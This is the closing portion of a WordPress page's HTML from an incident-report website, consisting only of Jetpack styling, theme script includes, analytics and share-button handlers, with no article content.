.components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form input[type=email]{box-sizing:border-box;cursor:pointer;line-height:1.3;min-width:auto!important;white-space:nowrap!important}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__button[contenteditable=true],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__button[contenteditable=true]{white-space:pre-wrap!important}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form input[type=email]::placeholder,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form input[type=email]:disabled,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form input[type=email]::placeholder,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form input[type=email]:disabled{color:currentColor;opacity:.5}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form button{border-color:#0000;border-style:solid}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email{background:#0000;flex-grow:1}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form .wp-block-jetpack-subscriptions__textfield input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form .wp-block-jetpack-subscriptions__textfield input[type=email],.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email .components-base-control__field,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email .components-text-control__input,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email input[type=email]{height:auto;margin:0;width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline .wp-block-jetpack-subscriptions__form p#subscribe-submit,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-email,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline form p#subscribe-submit{line-height:0;margin:0;padding:0}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__show-subs .wp-block-jetpack-subscriptions__subscount{font-size:16px;margin:8px 0;text-align:end}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__form-elements{display:block}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__button,.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline button{display:inline-block;max-width:100%}.wp-block-jetpack-subscriptions.wp-block-jetpack-subscriptions__supports-newline.wp-block-jetpack-subscriptions__use-newline .wp-block-jetpack-subscriptions__subscount{text-align:start}#subscribe-submit.is-link{text-align:center;width:auto!important}#subscribe-submit.is-link a{margin-left:0!important;margin-top:0!important;width:auto!important}@keyframes jetpack-memberships_button__spinner-animation{to{transform:rotate(1turn)}}.jetpack-memberships-spinner{display:none;height:1em;margin:0 0 0 5px;width:1em}.jetpack-memberships-spinner svg{height:100%;margin-bottom:-2px;width:100%}.jetpack-memberships-spinner-rotating{animation:jetpack-memberships_button__spinner-animation .75s linear infinite;transform-origin:center}.is-loading .jetpack-memberships-spinner{display:inline-block}body.jetpack-memberships-modal-open{overflow:hidden}dialog.jetpack-memberships-modal{opacity:1}dialog.jetpack-memberships-modal,dialog.jetpack-memberships-modal iframe{background:#0000;border:0;bottom:0;box-shadow:none;height:100%;left:0;margin:0;padding:0;position:fixed;right:0;top:0;width:100%}dialog.jetpack-memberships-modal::backdrop{background-color:#000;opacity:.7;transition:opacity .2s ease-out}dialog.jetpack-memberships-modal.is-loading,dialog.jetpack-memberships-modal.is-loading::backdrop{opacity:0} </style> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/navigation.min.js?ver=6.7.2" id="freenews-navigation-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/skip-link-focus-fix.js?ver=6.7.2" id="freenews-skip-link-focus-fix-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/ResizeSensor.min.js?ver=6.7.2" id="ResizeSensor-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky-sidebar/theia-sticky-sidebar.min.js?ver=6.7.2" id="theia-sticky-sidebar-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick.min.js?ver=6.7.2" id="slick-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/slick/slick-settings.js?ver=6.7.2" id="freenews-slick-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/jquery.sticky.js?ver=6.7.2" id="jquery-sticky-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/sticky/sticky-setting.js?ver=6.7.2" id="freenews-sticky-settings-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/jquery.marquee.min.js?ver=6.7.2" id="marquee-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/library/marquee/marquee-settings.js?ver=6.7.2" id="freenews-marquee-settings-js"></script> <script type="text/javascript" src="https://stats.wp.com/e-202508.js" id="jetpack-stats-js" data-wp-strategy="defer"></script> <script type="text/javascript" id="jetpack-stats-js-after"> /* <![CDATA[ */ _stq = window._stq || []; _stq.push([ "view", JSON.parse("{\"v\":\"ext\",\"blog\":\"175340963\",\"post\":\"5981\",\"tz\":\"0\",\"srv\":\"thedfirreport.com\",\"j\":\"1:14.3\"}") ]); _stq.push([ "clickTrackerInit", "175340963", "5981" ]); /* ]]> */ </script> <script type="text/javascript" id="google-translate-init-js-extra"> /* <![CDATA[ */ var _wp_google_translate_widget = {"lang":"en_US","layout":"0"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.3/_inc/build/widgets/google-translate/google-translate.min.js" id="google-translate-init-js"></script> <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit&ver=14.3" id="google-translate-js"></script> <script type="text/javascript" id="jetpack-blocks-assets-base-url-js-before"> /* <![CDATA[ */ var Jetpack_Block_Assets_Base_Url="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/"; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/dist/dom-ready.min.js" id="wp-dom-ready-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/dist/vendor/wp-polyfill.min.js" id="wp-polyfill-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/plugins/jetpack/_inc/blocks/subscriptions/view.js?minify=false&ver=14.3" id="jetpack-block-subscriptions-js"></script> <script type="text/javascript" id="sharing-js-js-extra"> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.3/_inc/build/sharedaddy/sharing.min.js" id="sharing-js-js"></script> <script type="text/javascript" id="sharing-js-js-after"> /* <![CDATA[ */ var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-twitter' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-linkedin' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-linkedin' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' ); return false; } } ); } )(); var windowOpen; ( function () { function matches( el, sel ) { return !! ( el.matches && el.matches( sel ) || el.msMatchesSelector && el.msMatchesSelector( sel ) ); } document.body.addEventListener( 'click', function ( event ) { if ( ! event.target ) { return; } var el; if ( matches( event.target, 'a.share-facebook' ) ) { el = event.target; } else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) { el = event.target.parentNode; } if ( el ) { event.preventDefault(); // If there's another sharing window open, close it. if ( typeof windowOpen !== 'undefined' ) { windowOpen.close(); } windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' ); return false; } } ); } )(); /* ]]> */ </script> </body> </html>